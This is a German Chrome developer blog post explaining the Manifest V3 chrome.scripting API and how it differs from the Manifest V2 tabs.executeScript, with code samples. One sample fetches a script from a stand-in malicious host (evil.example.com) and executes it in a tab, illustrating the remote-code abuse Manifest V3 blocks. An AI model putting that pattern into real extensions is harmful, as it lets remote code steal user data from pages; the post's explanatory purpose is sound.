Jetzt neu: chrome.scripting

Simeon Vincent

Mit Manifest V3 werden einige Änderungen an der Erweiterungsplattform von Chrome eingeführt. In diesem Beitrag werden die Motivationen und Änderungen untersucht, die durch eine der wichtigsten Änderungen eingeführt wurden: die Einführung der chrome.scripting API.

Was ist „chrome.scripting“?

Wie der Name schon sagt, ist chrome.scripting ein neuer Namespace, der in Manifest V3 eingeführt wurde und für die Funktionen zum Einfügen von Skripten und Stilen verantwortlich ist.

Entwickler, die in der Vergangenheit Chrome-Erweiterungen erstellt haben, sind möglicherweise mit Manifest V2-Methoden in der Tabs API wie chrome.tabs.executeScript und chrome.tabs.insertCSS vertraut. Mit diesen Methoden können Erweiterungen Skripts bzw. Stylesheets in Seiten einfügen. In Manifest V3 wurden diese Funktionen in chrome.scripting verschoben. Wir planen, diese API in Zukunft um einige neue Funktionen zu erweitern.

Warum eine neue API erstellen?

Bei einer solchen Änderung stellt sich natürlich als Erstes die Frage: „Warum?“

Mehrere Faktoren haben das Chrome-Team dazu veranlasst, einen neuen Namespace für das Scripting einzuführen. Erstens ist die Tabs API eine Art Fundgrube für Funktionen. Zweitens mussten wir funktionsgefährdende Änderungen an der vorhandenen executeScript API vornehmen. Drittens wollten wir die Scripting-Funktionen für Erweiterungen erweitern. Diese Bedenken machten deutlich, dass ein neuer Namespace für Scripting-Funktionen erforderlich war.

Die Schublade mit Krimskrams

Eines der Probleme, das das Extensions-Team in den letzten Jahren beschäftigt hat, ist die Überlastung der chrome.tabs API. Als diese API eingeführt wurde, bezogen sich die meisten ihrer Funktionen auf das allgemeine Konzept eines Browser-Tabs. Doch schon damals war es eine bunte Mischung an Funktionen, die im Laufe der Jahre nur noch gewachsen ist.

Als Manifest V3 veröffentlicht wurde, umfasste die Tabs API bereits die grundlegende Tabverwaltung, die Auswahlverwaltung, die Fensterorganisation, Messaging, die Zoomsteuerung, die grundlegende Navigation, Scripting und einige andere kleinere Funktionen. Diese sind zwar alle wichtig, können aber für Entwickler, die gerade erst anfangen, und für das Chrome-Team, das die Plattform verwaltet und Anfragen der Entwickler-Community berücksichtigt, etwas überwältigend sein.

Ein weiterer erschwerender Faktor ist, dass die Berechtigung tabs nicht gut verstanden wird. Während viele andere Berechtigungen den Zugriff auf eine bestimmte API einschränken (z.B. storage), ist diese Berechtigung etwas ungewöhnlich, da sie der Erweiterung nur Zugriff auf vertrauliche Eigenschaften von Tab-Instanzen gewährt und sich dadurch auch auf die Windows API auswirkt. Viele Erweiterungsentwickler gehen fälschlicherweise davon aus, dass sie diese Berechtigung benötigen, um auf Methoden der Tabs API wie chrome.tabs.create oder chrome.tabs.executeScript zuzugreifen. Durch das Auslagern von Funktionen aus der Tabs API wird diese Verwirrung verringert.

Wichtige Änderungen

Beim Entwerfen von Manifest V3 wollten wir vor allem das Problem von Missbrauch und Malware angehen, die durch „extern gehosteten Code“ ermöglicht werden. Das ist Code, der ausgeführt wird, aber nicht im Erweiterungspaket enthalten ist. Es ist üblich, dass Autoren missbräuchlicher Erweiterungen Skripts ausführen, die von Remoteservern abgerufen werden, um Nutzerdaten zu stehlen, Malware einzuschleusen und einer Entdeckung zu entgehen. Auch wenn sie von Nutzern mit guten Absichten verwendet wird, war sie in ihrer ursprünglichen Form einfach zu gefährlich.

Es gibt verschiedene Möglichkeiten, wie Erweiterungen nicht gebündelten Code ausführen können. Die hier relevante Methode ist jedoch die chrome.tabs.executeScript-Methode von Manifest V2. Mit dieser Methode kann eine Erweiterung einen beliebigen Code-String auf einem Zieltab ausführen. Das bedeutet, dass ein böswilliger Entwickler ein beliebiges Skript von einem Remote-Server abrufen und auf jeder Seite ausführen kann, auf die die Erweiterung zugreifen kann. Wir wussten, dass wir diese Funktion einstellen mussten, um das Problem mit dem Remote-Code zu beheben.

(async function() {
  let result = await fetch('https://evil.example.com/malware.js');
  let script = await result.text();

  chrome.tabs.executeScript({
    code: script,
  });
})();

Außerdem wollten wir einige andere, subtilere Probleme mit dem Design der Manifest V2-Version beheben und die API zu einem ausgereifteren und vorhersehbareren Tool machen.

Wir hätten die Signatur dieser Methode in der Tabs API ändern können, aber wir waren der Meinung, dass ein sauberer Bruch zwischen diesen Breaking Changes und der Einführung neuer Funktionen (siehe nächster Abschnitt) für alle einfacher wäre.

Erweiterung der Skripting-Funktionen

Ein weiterer Aspekt, der in den Designprozess von Manifest V3 einfloss, war der Wunsch, zusätzliche Scripting-Funktionen in die Erweiterungsplattform von Chrome einzuführen. Konkret wollten wir Unterstützung für dynamische Inhaltsskripts hinzufügen und die Funktionen der executeScript-Methode erweitern.

Die Unterstützung von Skripts für dynamische Inhalte war eine langjährige Funktionsanfrage in Chromium. Derzeit können Manifest V2- und V3-Chrome-Erweiterungen Content-Scripts nur statisch in ihrer manifest.json-Datei deklarieren. Die Plattform bietet keine Möglichkeit, neue Content-Scripts zu registrieren, die Registrierung von Content-Scripts anzupassen oder die Registrierung von Content-Scripts zur Laufzeit aufzuheben.

Wir wussten zwar, dass wir diesen Wunsch in Manifest V3 umsetzen wollten, aber keine unserer vorhandenen APIs schien dafür geeignet zu sein. Wir haben auch in Erwägung gezogen, uns an der Content Scripts API von Firefox zu orientieren, haben aber schon sehr früh einige große Nachteile dieses Ansatzes erkannt. Zuerst war uns klar, dass wir inkompatible Signaturen haben würden, z.B. wenn wir die Unterstützung für die code-Eigenschaft einstellen. Zweitens hatte unsere API andere Designbeschränkungen, z.B. musste eine Registrierung über die Lebensdauer eines Service Workers hinaus bestehen bleiben. Außerdem würde dieser Namespace uns auf die Funktionalität von Content-Scripts beschränken, während wir über das Scripting in Erweiterungen im Allgemeinen nachdenken.

Auch bei der executeScript wollten wir die Möglichkeiten dieser API über die Funktionen der Tabs API-Version hinaus erweitern. Konkret wollten wir Funktionen und Argumente unterstützen, bestimmte Frames einfacher ansprechen und auf Kontexte abzielen, die nicht „tab“ sind.

Wir überlegen auch, wie Erweiterungen mit installierten PWAs und anderen Kontexten interagieren können, die konzeptionell nicht mit „Tabs“ übereinstimmen.

Änderungen zwischen tabs.executeScript und scripting.executeScript

Im weiteren Verlauf dieses Beitrags möchte ich mir die Ähnlichkeiten und Unterschiede zwischen chrome.tabs.executeScript und chrome.scripting.executeScript genauer ansehen.

Funktion mit Argumenten einfügen

Bei der Überlegung, wie sich die Plattform angesichts der Einschränkungen für remote gehosteten Code weiterentwickeln müsste, wollten wir ein Gleichgewicht zwischen der rohen Leistung der Ausführung von beliebigem Code und der Zulassung von statischen Inhaltsskripten finden. Wir haben uns dafür entschieden, dass Erweiterungen eine Funktion als Inhaltsskript einfügen und ein Array von Werten als Argumente übergeben können.

Sehen wir uns ein (vereinfachtes) Beispiel an. Angenommen, wir möchten ein Skript einfügen, das den Nutzer mit Namen begrüßt, wenn er auf die Aktionsschaltfläche der Erweiterung (Symbol in der Symbolleiste) klickt. In Manifest V2 konnten wir dynamisch eine Code-String erstellen und das Skript auf der aktuellen Seite ausführen.

// Manifest V2 extension
chrome.browserAction.onClicked.addListener(async (tab) => {
  let userReq = await fetch('https://example.com/greet-user.js');
  let userScript = await userReq.text();

  chrome.tabs.executeScript({
    // userScript == 'alert("Hello, <GIVEN_NAME>!")'
    code: userScript,
  });
});

Manifest V3-Erweiterungen können zwar keinen Code verwenden, der nicht mit der Erweiterung gebündelt ist, aber wir wollten einen Teil der Dynamik beibehalten, die beliebige Codeblöcke für Manifest V2-Erweiterungen ermöglichten. Durch die Verwendung von Funktionen und Argumenten können Prüfer, Nutzer und andere Interessierte im Chrome Web Store die Risiken einer Erweiterung genauer einschätzen. Gleichzeitig können Entwickler das Laufzeitverhalten einer Erweiterung basierend auf Nutzereinstellungen oder dem Anwendungsstatus ändern.

// Manifest V3 extension
function greetUser(name) {
  alert(`Hello, ${name}!`);
}
chrome.action.onClicked.addListener(async (tab) => {
  let userReq = await fetch('https://example.com/user-data.json');
  let user = await userReq.json();
  let givenName = user.givenName || '<GIVEN_NAME>';

  chrome.scripting.executeScript({
    target: {tabId: tab.id},
    func: greetUser,
    args: [givenName],
  });
});

Targeting-Frames

Außerdem wollten wir die Interaktion von Entwicklern mit Frames in der überarbeiteten API verbessern. Mit der Manifest V2-Version von executeScript konnten Entwickler entweder alle Frames auf einem Tab oder einen bestimmten Frame auf dem Tab anvisieren. Mit chrome.webNavigation.getAllFrames können Sie eine Liste aller Frames auf einem Tab abrufen.

// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
  chrome.webNavigation.getAllFrames({tabId: tab.id}, (frames) => {
    let frame1 = frames[0].frameId;
    let frame2 = frames[1].frameId;

    chrome.tabs.executeScript(tab.id, {
      frameId: frame1,
      file: 'content-script.js',
    });
    chrome.tabs.executeScript(tab.id, {
      frameId: frame2,
      file: 'content-script.js',
    });
  });
});

In Manifest V3 haben wir die optionale Integer-Eigenschaft frameId im Optionsobjekt durch ein optionales Integer-Array frameIds ersetzt. So können Entwickler mit einem einzigen API-Aufruf mehrere Frames ansprechen.

// Manifest V3 extension
chrome.action.onClicked.addListener(async (tab) => {
  let frames = await chrome.webNavigation.getAllFrames({tabId: tab.id});
  let frame1 = frames[0].frameId;
  let frame2 = frames[1].frameId;

  chrome.scripting.executeScript({
    target: {
      tabId: tab.id,
      frameIds: [frame1, frame2],
    },
    files: ['content-script.js'],
  });
});

Ergebnisse der Skriptinjektion

Außerdem haben wir die Art und Weise verbessert, wie wir Ergebnisse der Skriptinjektion in Manifest V3 zurückgeben. Ein „Ergebnis“ ist im Grunde die endgültige Anweisung, die in einem Script ausgewertet wird. Stellen Sie sich das so vor, als würden Sie eval() aufrufen oder einen Codeblock in der Chrome-Entwicklertools-Konsole ausführen. Die Ergebnisse werden jedoch serialisiert, um sie prozessübergreifend zu übergeben.

In Manifest V2 würden executeScript und insertCSS ein Array mit einfachen Ausführungsergebnissen zurückgeben. Das ist in Ordnung, wenn Sie nur einen Einfügepunkt haben. Wenn Sie jedoch in mehrere Frames einfügen, ist die Reihenfolge der Ergebnisse nicht garantiert. Es ist also nicht möglich, zu bestimmen, welches Ergebnis welchem Frame zugeordnet ist.

Sehen wir uns als konkretes Beispiel die results-Arrays an, die von einer Manifest V2- und einer Manifest V3-Version derselben Erweiterung zurückgegeben werden. In beiden Versionen der Erweiterung wird dasselbe Content-Script eingefügt und wir vergleichen die Ergebnisse auf derselben Demoseite.

// content-script.js
var headers = document.querySelectorAll('p');
headers.length;

Wenn wir die Manifest V2-Version ausführen, erhalten wir ein Array von [1, 0, 5]. Welches Ergebnis entspricht dem Hauptframe und welches dem iFrame? Der Rückgabewert gibt uns keine Auskunft, daher wissen wir es nicht genau.

// Manifest V2 extension
chrome.browserAction.onClicked.addListener((tab) => {
  chrome.tabs.executeScript({
    allFrames: true,
    file: 'content-script.js',
  }, (results) => {
    // results == [1, 0, 5]
    for (let result of results) {
      if (result > 0) {
        // Do something with the frame... which one was it?
      }
    }
  });
});

In der Manifest V3-Version enthält results jetzt ein Array von Ergebnissen anstelle eines Arrays von nur den Auswertungsergebnissen. Die Ergebnisobjekte enthalten die ID des Frames für jedes Ergebnis. Dadurch können Entwickler das Ergebnis viel einfacher nutzen und Maßnahmen für einen bestimmten Frame ergreifen.

// Manifest V3 extension
chrome.action.onClicked.addListener(async (tab) => {
  let results = await chrome.scripting.executeScript({
    target: {tabId: tab.id, allFrames: true},
    files: ['content-script.js'],
  });
  // results == [
  //   {frameId: 0, result: 1},
  //   {frameId: 1235, result: 5},
  //   {frameId: 1234, result: 0}
  // ]

  for (let result of results) {
    if (result.result > 0) {
      console.log(`Found ${result} p tag(s) in frame ${result.frameId}`);
      // Found 1 p tag(s) in frame 0
      // Found 5 p tag(s) in frame 1235
    }
  }
});

Zusammenfassung

Manifestversionsänderungen bieten eine seltene Gelegenheit, Erweiterungs-APIs zu überdenken und zu modernisieren. Unser Ziel mit Manifest V3 ist es, die Nutzerfreundlichkeit zu verbessern, indem wir Erweiterungen sicherer machen und gleichzeitig die Entwicklerfreundlichkeit verbessern. Durch die Einführung von chrome.scripting in Manifest V3 konnten wir die Tabs API bereinigen, executeScript für eine sicherere Erweiterungsplattform neu konzipieren und den Grundstein für neue Scripting-Funktionen legen, die später in diesem Jahr eingeführt werden.

Jetzt neu: chrome.scripting Mit Sammlungen den Überblick behalten Sie können Inhalte basierend auf Ihren Einstellungen speichern und kategorisieren.